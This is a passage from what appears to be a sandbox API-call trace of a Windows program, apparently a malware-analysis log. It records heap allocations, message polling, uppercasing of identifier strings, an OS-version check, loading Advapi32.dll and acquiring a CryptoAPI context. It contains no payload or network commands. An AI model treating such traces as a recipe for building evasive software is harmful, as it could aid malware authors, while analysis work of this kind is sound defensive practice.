Flags=0x0, Size=0x8) returned 0x24b1708 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.838] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0165.839] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.839] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.839] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.840] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.840] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.840] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.840] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.840] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.840] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.841] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.841] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.842] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.842] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.842] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.842] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0165.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.843] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.843] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0165.843] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.843] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.843] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.843] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.843] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.843] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.843] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0165.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0165.843] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.844] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.844] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0165.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.851] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.851] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0165.851] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.851] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0165.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0165.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0165.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0165.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0165.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0165.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0165.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0165.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.855] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0165.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0165.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b36f8 [0165.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466e10 [0165.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0165.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.856] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0165.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0165.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0165.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0165.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0165.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0165.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0165.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.856] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0165.857] 